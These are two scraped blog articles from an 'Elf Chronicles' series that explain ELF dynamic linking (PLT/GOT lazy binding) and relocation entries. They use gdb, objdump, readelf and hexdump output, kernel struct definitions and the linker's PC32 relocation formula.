\u0026lt;+73\u0026gt;: call 0x555555555060 \u0026lt;__isoc99_scanf@plt\u0026gt; Interesting thing to note here is that they point to addresses which are just 0x555555555060 - 0x555555555050 = 16 bytes away from each other. I\u0026rsquo;m sure none of these functions can be defined in just 16 bytes.\nThis is the PLT stub, the area which is referred by .text section for all kinds of dynamic linked library calls.\n(gdb) x/3i 0x555555555050 0x555555555050 \u0026lt;printf@plt\u0026gt;: jmp QWORD PTR [rip+0x2fba] # 0x555555558010 \u0026lt;printf@got.plt\u0026gt; 0x555555555056 \u0026lt;printf@plt+6\u0026gt;: push 0x2 0x55555555505b \u0026lt;printf@plt+11\u0026gt;: jmp 0x555555555020 (gdb) x/3i 0x555555555060 0x555555555060 \u0026lt;__isoc99_scanf@plt\u0026gt;: jmp QWORD PTR [rip+0x2fb2] # 0x555555558018 \u0026lt;__isoc99_scanf@got.plt\u0026gt; 0x555555555066 \u0026lt;__isoc99_scanf@plt+6\u0026gt;: push 0x3 0x55555555506b \u0026lt;__isoc99_scanf@plt+11\u0026gt;: jmp 0x555555555020 If you examine the first instructions in both, you\u0026rsquo;ll notice they both point to memory locations 0x555555558010 and 0x555555558018, which are the Global Offset Table (GOT) entries. These entries hold addresses of actual functions from the dynamic libraries. You can inspect these locations to find where the first instruction in the PLT stub is directing the jump to.\n(gdb) x/1x 0x555555558010 0x555555558010 \u0026lt;printf@got.plt\u0026gt;: 0x55555056 (gdb) x/1x 0x555555558018 0x555555558018 \u0026lt;__isoc99_scanf@got.plt\u0026gt;: 0x55555066 Alright, since we\u0026rsquo;re using these functions for the first time, the steps of finding the function\u0026rsquo;s address and storing it in the Global Offset Table haven\u0026rsquo;t been completed yet (which is part of the lazy binding logic). So, the program jumps to the next step instead (0x55555056 and 0x55555066 respectively).\nIn next instruction from PLT stub, a certain number onto the stack\u0026hellip; and then both of the PLT stubs jump to same address \u0026ndash; 0x555555555020. This is the address which should trigger the dynamic symbol resolution process.\n(gdb) x/3i 0x555555555020 =\u0026gt; 0x555555555020: push QWORD PTR [rip+0x2fca] # 0x555555557ff0 0x555555555026: jmp QWORD PTR [rip+0x2fcc] # 0x555555557ff8 0x55555555502c: nop DWORD PTR [rax+0x0] It pushes something (0x555555557ff0) to stack and then jumps to 0x555555557ff8 address which is actually _dl_runtime_resolve_xsavec function in our dynamic linker (/lib64/ld-linux-x86-64.so.2). This function will resolve the address for printf and scanf and then patch the GOT table for it.\nOnce that is done, you can check the patched entries in the GOT tables\n(gdb) x/1x 0x555555558010 0x555555558010 \u0026lt;printf@got.plt\u0026gt;: 0xf7e16730 (gdb) x/1x 0x555555558018 0x555555558018 \u0026lt;__isoc99_scanf@got.plt\u0026gt;: 0xf7e16430 Now, these are the real addresses for the printf and scanf functions within the calc program\u0026rsquo;s memory space. With this completed, whenever calc needs to use printf or scanf, their addresses will already be stored in the GOT table, which can be accessed by the corresponding PLT stubs.\nConclusion In conclusion, dynamic linking plays a crucial role in how programs interact with shared libraries in Linux systems. By utilizing mechanisms like the Procedure Linkage Table (PLT) and the Global Offset Table (GOT), programs can efficiently access functions from shared libraries at runtime. This process involves lazy binding, where function addresses are resolved and stored in the GOT only when they are first called, optimizing performance and memory usage. Through this approach, programs like calc can seamlessly utilize functions like printf and scanf without the need for manual intervention or redundant loading of shared libraries. Overall, dynamic linking provides a flexible and efficient way for programs to access external functionality, enhancing the functionality and usability of software on Linux platforms.\nResources https://developer.ibm.com/tutorials/l-dynamic-libraries/ https://opensource.com/article/22/5/dynamic-linking-modular-libraries-linux https://www.baeldung.com/cs/dynamic-linking-vs-dynamic-loading#2-dynamic-linking\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.baeldung.com/cs/dynamic-linking-vs-dynamic-loading#loading\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2024/04/elf-chronicles-plt-got/","summary":"Intro In earlier articles, we talked about various parts of an ELF file and the many steps needed to create an executable ELF file that can run on your computer.\n(Note: The steps are shown visually below; For the source code, check out the symbol table article in this series.)\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.","title":"Elf Chronicles: PLT/GOT (7/?)"},{"content":"In previous article about Symbol Tables, we talked about the below diagram \u0026hellip;.\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.o │ │ │ │ │ └─────────┬───────────┘ └──────────┬─────────┘ │ │ │ │ │ │ │ │ │ /* Linking Magic */ │ └───────────────────────────────────┬──────────────────────────────────────┘ │ │ │ │ │ │ ▼ ┌────────────────┐ │ │ │ calc │ │ │ └────────────────┘ \u0026hellip;and how the compiler was unaware of the final addresses for many symbols. When things get a bit confusing for the compiler, it takes the easy route by putting zeros in the addresses and creating relocation entries for the linker/loader to sort out.\nThe linker combines all the .o files, causing changes to the positions of different parts. For example, the main function in main.o and addFunc in libarithmatic.o both start off at position 0x0. But when you link these files, this setup causes issues, so some tweaks are needed.\nIn this situation, the compiler and assembler team up to produce the .o file, but they don\u0026rsquo;t know for sure where each part will end up in the eventual calc binary. So, they play it safe by leaving these spots empty and make notes in the relocations section. This tells the linker that these positions need some adjustments later on.\nRelocations According to ELF specification (version 1.2)\nRelocation is the process of connecting symbolic references with symbolic definitions.\nRelocation is a straightforward concept in coding. When you\u0026rsquo;re compiling code, the compiler doesn\u0026rsquo;t always know the exact addresses for everything in the program. ELF relocations become important when the addresses of symbols are uncertain during compilation, often because the final addresses are determined by the linker or loader at a later stage. It\u0026rsquo;s similar to arranging pieces in a puzzle without having all the details upfront.\n## Before linking - main.o ❯ objdump -M intel -D -j .text main.o | grep call 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; 49: e8 00 00 00 00 call 4e \u0026lt;main+0x4e\u0026gt; 86: e8 00 00 00 00 call 8b \u0026lt;main+0x8b\u0026gt; a3: e8 00 00 00 00 call a8 \u0026lt;main+0xa8\u0026gt; c0: e8 00 00 00 00 call c5 \u0026lt;main+0xc5\u0026gt; dd: e8 00 00 00 00 call e2 \u0026lt;main+0xe2\u0026gt; f5: e8 00 00 00 00 call fa \u0026lt;main+0xfa\u0026gt; 123: e8 00 00 00 00 call 128 \u0026lt;main+0x128\u0026gt; 13c: e8 00 00 00 00 call 141 \u0026lt;main+0x141\u0026gt; ## After linking - calc ❯ objdump -M intel -D -j .text calc | grep call 1138: e8 63 ff ff ff call 10a0 \u0026lt;_start+0x30\u0026gt; 118f: e8 bc fe ff ff call 1050 \u0026lt;printf@plt\u0026gt; 11b2: e8 a9 fe ff ff call 1060 \u0026lt;__isoc99_scanf@plt\u0026gt; 11ef: e8 b8 00 00 00 call 12ac \u0026lt;addFunc\u0026gt; 120c: e8 b5 00 00 00 call 12c6 \u0026lt;subFunc\u0026gt; 1229: e8 b2 00 00 00 call 12e0 \u0026lt;mulFunc\u0026gt; 1246: e8 af 00 00 00 call 12fa \u0026lt;divFunc\u0026gt; 125e: e8 cd fd ff ff call 1030 \u0026lt;puts@plt\u0026gt; 128c: e8 bf fd ff ff call 1050 \u0026lt;printf@plt\u0026gt; 12a5: e8 96 fd ff ff call 1040 \u0026lt;__stack_chk_fail@plt\u0026gt; Now, there are three essential elements needed for relocation to take place:\nThe spot where the adjustment needs to be made. The symbol that\u0026rsquo;s part of the adjustment. An algorithm specifying how to calculate and apply the necessary fix. The compiler stores all this information in a special section identified by type - either REL (0x9) or RELA (0x4).\nREL is used for basic relocation entries. RELA is essentially the same as REL, but with an extra addend value. This doesn\u0026rsquo;t significantly impact the concept, though. You can easily identify these sections using readelf;\u0026hellip;\n❯ readelf --section-headers --wide main.o There are 14 section headers, starting at offset 0x5a8: Section Headers: [Nr] Name Type Address Off Size ES Flg Lk Inf Al [ 0] NULL 0000000000000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 0000000000000000 000040 000143 00 AX 0 0 1 [ 2] .rela.text RELA 0000000000000000 0003e0 000138 18 I 11 1 8 [ 3] .data PROGBITS 0000000000000000 000183 000000 00 WA 0 0 1 [ 4] .bss NOBITS 0000000000000000 000183 000000 00 WA 0 0 1 [ 5] .rodata PROGBITS 0000000000000000 000183 000041 00 A 0 0 1 [ 6] .comment PROGBITS 0000000000000000 0001c4 00001c 01 MS 0 0 1 [ 7] .note.GNU-stack PROGBITS 0000000000000000 0001e0 000000 00 0 0 1 [ 8] .note.gnu.property NOTE 0000000000000000 0001e0 000030 00 A 0 0 8 [ 9] .eh_frame PROGBITS 0000000000000000 000210 000038 00 A 0 0 8 [10] .rela.eh_frame RELA 0000000000000000 000518 000018 18 I 11 9 8 [11] .symtab SYMTAB 0000000000000000 000248 000138 18 12 4 8 [12] .strtab STRTAB 0000000000000000 000380 000059 00 0 0 1 [13] .shstrtab STRTAB 0000000000000000 000530 000074 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), L (link order), O (extra OS processing required), G (group), T (TLS), C (compressed), x (unknown), o (OS specific), E (exclude), D (mbind), l (large), p (processor specific) My parser gives me the same results\u0026hellip; (with different looks)\n[ 00 ] Section Name: Type: 0x0 Flags: 0x0 Addr: 0x0 Offset: 0x0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x0 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 01 ] Section Name: .text Type: 0x1 Flags: 0x6 Addr: 0x0 Offset: 0x40 Size: 323 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x3e0 Size: 312 Link: 11 Info: 0x1 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 03 ] Section Name: .data Type: 0x1 Flags: 0x3 Addr: 0x0 Offset: 0x183 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 04 ] Section Name: .bss Type: 0x8 Flags: 0x3 Addr: 0x0 Offset: 0x183 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 05 ] Section Name: .rodata Type: 0x1 Flags: 0x2 Addr: 0x0 Offset: 0x183 Size: 65 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 06 ] Section Name: .comment Type: 0x1 Flags: 0x30 Addr: 0x0 Offset: 0x1c4 Size: 28 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 1 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 07 ] Section Name: .note.GNU-stack Type: 0x1 Flags: 0x0 Addr: 0x0 Offset: 0x1e0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 08 ] Section Name: .note.gnu.property Type: 0x7 Flags: 0x2 Addr: 0x0 Offset: 0x1e0 Size: 48 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 09 ] Section Name: .eh_frame Type: 0x1 Flags: 0x2 Addr: 0x0 Offset: 0x210 Size: 56 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 10 ] Section Name: .rela.eh_frame Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x518 Size: 24 Link: 11 Info: 0x9 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 12 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x380 Size: 89 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 13 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x530 Size: 116 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- In any case, identifying the relocation sections is straightforward \u0026ndash; REL (0x9) or RELA (0x4).\n# From readelf [Nr] Name Type Address Off Size ES Flg Lk Inf Al [ 2] .rela.text RELA 0000000000000000 0003e0 000138 18 I 11 1 8 [10] .rela.eh_frame RELA 0000000000000000 000518 000018 18 I 11 9 8 # From my parser [ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x3e0 Size: 312 Link: 11 Info: 0x1 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 10 ] Section Name: .rela.eh_frame Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x518 Size: 24 Link: 11 Info: 0x9 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- (Note: To keep things clear in this article and to maintain simplicity, we\u0026rsquo;re going to ignore the .rela.eh_frame. We can dive into that particular aspect another time.)\nWe can use the details shared earlier to pinpoint the real data of the relocation section. This means we\u0026rsquo;ll be finding the section data by using the section header entry \u0026ndash; a process we\u0026rsquo;ve gone through multiple times before.\n[ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 ┌─────────Offset: 0x3e0 │ ┌──Size: 312 │ │ Link: 11 │ │ Info: 0x1 │ │ Addralign: 0x8 │ │ Entsize: 24 │ │ │ │ │ │ │ │ │ ▼ ▼ ▼ ❯ xxd -s 0x3e0 -l 0x138 -c 0x18 main.o | nl -v0 - 0 000003e0: 1a00 0000 0000 0000 0200 0000 0300 0000 fcff ffff ffff ffff ........................ 1 000003f8: 2700 0000 0000 0000 0400 0000 0500 0000 fcff ffff ffff ffff \u0026#39;....................... 2 00000410: 3d00 0000 0000 0000 0200 0000 0300 0000 1500 0000 0000 0000 =....................... 3 00000428: 4a00 0000 0000 0000 0400 0000 0600 0000 fcff ffff ffff ffff J....................... 4 00000440: 8700 0000 0000 0000 0400 0000 0700 0000 fcff ffff ffff ffff ........................ 5 00000458: a400 0000 0000 0000 0400 0000 0800 0000 fcff ffff ffff ffff ........................ 6 00000470: c100 0000 0000 0000 0400 0000 0900 0000 fcff ffff ffff ffff ........................ 7 00000488: de00 0000 0000 0000 0400 0000 0a00 0000 fcff ffff ffff ffff ........................ 8 000004a0: ee00 0000 0000 0000 0200 0000 0300 0000 1e00 0000 0000 0000 ........................ 9 000004b8: f600 0000 0000 0000 0400 0000 0b00 0000 fcff ffff ffff ffff ........................ 10 000004d0: 1701 0000 0000 0000 0200 0000 0300 0000 2f00 0000 0000 0000 ................/....... 11 000004e8: 2401 0000 0000 0000 0400 0000 0500 0000 fcff ffff ffff ffff $....................... 12 00000500: 3d01 0000 0000 0000 0400 0000 0c00 0000 fcff ffff ffff ffff =....................... Linux kernel has some specific structures to define REL and RELA entries\u0026hellip;.\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L171 */ typedef struct elf64_rel { Elf64_Addr r_offset;\t/* Location at which to apply the action */ Elf64_Xword r_info;\t/* index and type of relocation */ } Elf64_Rel; /* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L182 */ typedef struct elf64_rela { Elf64_Addr r_offset;\t/* Location at which to apply the action */ Elf64_Xword r_info;\t/* index and type of relocation */ Elf64_Sxword r_addend;\t/* Constant addend used to compute value */ } Elf64_Rela; /* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L163 */ #define ELF64_R_SYM(i)\t((i) \u0026gt;\u0026gt; 32) #define ELF64_R_TYPE(i)\t((i) \u0026amp; 0xffffffff) After parsing this section\u0026rsquo;s data, I got following results.\n[ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x3e0 Size: 312 Link: 11 Info: 0x1 Addralign: 0x8 Entsize: 24 [ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 [ 1 ] Offset: 0x27 Info: 0x000500000004 (Sym: 0x5 | Type: 0x4) Addend: -4 [ 2 ] Offset: 0x3d Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: 21 [ 3 ] Offset: 0x4a Info: 0x000600000004 (Sym: 0x6 | Type: 0x4) Addend: -4 [ 4 ] Offset: 0x87 Info: 0x000700000004 (Sym: 0x7 | Type: 0x4) Addend: -4 [ 5 ] Offset: 0xa4 Info: 0x000800000004 (Sym: 0x8 | Type: 0x4) Addend: -4 [ 6 ] Offset: 0xc1 Info: 0x000900000004 (Sym: 0x9 | Type: 0x4) Addend: -4 [ 7 ] Offset: 0xde Info: 0x000a00000004 (Sym: 0xa | Type: 0x4) Addend: -4 [ 8 ] Offset: 0xee Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: 30 [ 9 ] Offset: 0xf6 Info: 0x000b00000004 (Sym: 0xb | Type: 0x4) Addend: -4 [ 10 ] Offset: 0x117 Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: 47 [ 11 ] Offset: 0x124 Info: 0x000500000004 (Sym: 0x5 | Type: 0x4) Addend: -4 [ 12 ] Offset: 0x13d Info: 0x000c00000004 (Sym: 0xc | Type: 0x4) Addend: -4 Let\u0026rsquo;s pause for a moment to grasp the significance of each member in this structure and how it aids the linker in the relocation process.\n(👇 Shamelessly stolen from man 5 elf 👇)\nr_offset This member gives the location at which to apply the relocation.\nFor a relocatable file, the value is the byte offset from the beginning of the section where relocation is to be applied. For an executable file or shared object, the value is the virtual address of the storage unit affected by the relocation. r_info This member gives both the symbol table index with respect to which the relocation must be made and the type of relocation to apply. (Linux kernel provides a macro to filter these values out from it - ELF64_R_SYM and ELF64_R_TYPE)\nr_addend This member specifies a constant addend used to compute the value to be stored into the relocatable field.\nAnalysis Now armed with the theoretical knowledge, let\u0026rsquo;s delve into how the linker utilizes this information to perform a relocation. We\u0026rsquo;ll begin by examining the details of the first relocation entry.\n[ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 Now there are 2 things I want you to think about before we even start with the relocation process\u0026hellip;\nWe know r_offset holds the offset from beginning of the section where relocation is to be applied. Which section is that here?? And ELF64_R_SYM from r_info stores the index in symbol table. But we can obviously have more than 1 symbol table, so Which symbol table we are talking about here?? Answer \u0026raquo; To identify that, you just have to check sh_info and sh_link members from the section header entry.\nIn our case, the associated symbol table and the section where relocations will apply can be viewed like this:-\n┌────────────────────────────────────┐ │ [ 11 ] Section Name: .symtab │◄───────┐ │ Type: 0x2 │ │ │ Flags: 0x0 │ │ │ Addr: 0x0 │ │ │ Offset: 0x248 │ │ │ Size: 312 │ │ │ Link: 12 │ │ │ Info: 0x4 │ │ │ Addralign: 0x8 │ │ │ Entsize: 24 │ │ │ │ │ └────────────────────────────────────┘ │ │ /* all the symbols associated │ are in section 11 */ │ │ │ ┌────────────────────────────────────┐ │ │ [ 02 ] Section Name: .rela.text │ │ │ Type: 0x4 │ │ │ Flags: 0x40 │ │ │ Addr: 0x0 │ │ │ Offset: 0x3e0 │ │ │ Size: 312 │ │ │ Link: 11 ─────────────────┼────────┘ ┌───────┼───────── Info: 0x1 │ │ │ Addralign: 0x8 │ │ │ Entsize: 24 │ │ │ │ │ └────────────────────────────────────┘ │ │ │ /* relocations apply to section with index 1 */ │ │ ┌───────────────────────────────────┐ └──────►│ [ 01 ] Section Name: .text │ │ Type: 0x1 │ │ Flags: 0x6 │ │ Addr: 0x0 │ │ Offset: 0x40 │ │ Size: 323 │ │ Link: 0 │ │ Info: 0x0 │ │ Addralign: 0x1 │ │ Entsize: 0 │ │ │ └───────────────────────────────────┘ Traditionally, the chosen naming scheme for the relocation section indicates the section where relocations are intended to be applied. For example, if relocations are to be applied on .text section, then the relocation entries will be under .rela.text or .rel.text. However, it\u0026rsquo;s crucial to note that this is merely a tradition and not a strict requirement.\nIn the wisdom of ancient gods, it is advised not to depend solely on names.\nNow that you know where to apply relocation and where to look for symbols\u0026hellip; let\u0026rsquo;s look at the relocation entry we started with\n[ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 We can now understand that:\nThe relocation is to be applied at offset 0x1a in .text section. The symbol associated with this relocation is 3rd symbol in .symtab section. So, if you want to see the big picture,\n┌────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐ │ [ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 │ │ [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 │ │ [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 │ ┌─────┼────► [ 3 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x5 Value: 0x000000000000 Size: 0x0 │ │ │ [ 4 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x143 │ │ │ [ 5 ] Name: printf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 6 ] Name: __isoc99_scanf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 7 ] Name: addFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 8 ] Name: subFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 9 ] Name: mulFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 10 ] Name: divFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 11 ] Name: puts Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 12 ] Name: __stack_chk_fail Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ │ │ └────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘ │ └──────────────────────────────────────────────────────────┐ │ │ │ │ │ [ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 │ │ │ │ └─────────────────────────┐ │ │ ┌────────────────────────────────┼───────────────────────────────────────────────────┐ │ │ │ │ Disassembly of section .text:│ │ │ │ │ │ 0000000000000000 \u0026lt;main\u0026gt;: │ │ │ 0: 55 │ push rbp │ │ 1: 48 89 e5 │ mov rbp,rsp │ │ 4: 48 83 ec 20 │ sub rsp,0x20 │ │ 8: 64 48 8b 04 25 28 00 │ mov rax,QWORD PTR fs:0x28 │ │ f: 00 00 ┌──┘ │ │ 11: 48 89 45 f8 ▼ mov QWORD PTR [rbp-0x8],rax │ │ 15: 31 c0 ┌───────────┐ xor eax,eax │ │ 17: 48 8d 05│00 00 00 00│ lea rax,[rip+0x0] # 1e \u0026lt;main+0x1e\u0026gt; │ │ 1e: 48 89 c7└───────────┘ mov rdi,rax │ │ 21: b8 00 00 00 00 mov eax,0x0 │ │ 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; │ │ 2b: 48 8d 4d f0 lea rcx,[rbp-0x10] │ │ │ └────────────────────────────────────────────────────────────────────────────────────┘ I get that things might look like a mess, a real puzzle at first. But trust me, with a bit of experience, you\u0026rsquo;ll start to figure it out.\nNow that we\u0026rsquo;ve uncovered the secret behind the symbol and pinpointed where the relocation is going to happen, it\u0026rsquo;s time to figure out the algorithm we\u0026rsquo;re going to use for relocation. Just peek into the Type part of r_info. In our case, it\u0026rsquo;s holding the number 0x2.\nWith a quick look at the gcc source code, I can tell you that this algorithm is R_X86_64_PC32\u0026hellip; And another brief look at the source code of mold (a modern linker) helps me fully comprehend the algorithm\u0026hellip;\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l3579 */ #define R_X86_64_PC32 2 /* PC relative 32 bit signed */ /* https://github.com/rui314/mold/blob/main/elf/arch-x86-64.cc#L433C1-L436C13 */ case R_X86_64_PC32: case R_X86_64_PLT32: write32s(S + A - P); break; Alright, so the magical spell for this relocation is S + A - P\u0026hellip;. Now, let\u0026rsquo;s break it down\nS = value of symbol A = Addend (r_addend) P = place of relocation (r_offset is used to calculate this) The addend (A) is simply -4. Why -4?? I don\u0026rsquo;t know 🤷 ¯\\_(ツ)_/¯ (If you happen to know it, please share your wisdom with this stuppid child\u0026hellip; pretty please! 🥺👉👈)\nAnd the place of relocation (P) should be 0x1a\u0026hellip; right? WRONG!!\u0026hellip; the place of relocation will be location of .text section + 0x1a. Linker will know where .text will be after the merge process, so it\u0026rsquo;ll be easy for the linker to get the exact location.\nFinally, value of symbol (S), this one is a bit tricky here\u0026hellip; You need to take a look at the symbol table for this\n[ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 Entsize: 24 [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x5 Value: 0x000000000000 Size: 0x0 [ 4 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x143 [ 5 ] Name: printf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 6 ] Name: __isoc99_scanf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 7 ] Name: addFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 8 ] Name: subFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 9 ] Name: mulFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 10 ] Name: divFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 11 ] Name: puts Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 12 ] Name: __stack_chk_fail Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 Just focus on the symbol for our case\u0026hellip; index 3.\n[ 3 ] Name: /* No name for symbol */ Info: 0x03 (Bind: 0x0 | Type: 0x3) /* Bind: STB_LOCAL | Type: STT_SECTION */ Other: 0x0 /* default visibility */ Shndx: 0x5 /* section 5; .rodata in our case */ Value: 0x000000000000 /* no value; I wonder what could be the value for \u0026#34;STT_SECTION\u0026#34; type symbol */ Size: 0x0 /* Unknown size */ Putting all the pieces together, it\u0026rsquo;s crystal clear now that this symbol is casually pointing towards .rodata section. Picture this section as a treasure trove of read-only data. An example? Think of it like a collection of strings that printf and its buddies use to sprinkle some magic onto your screen. 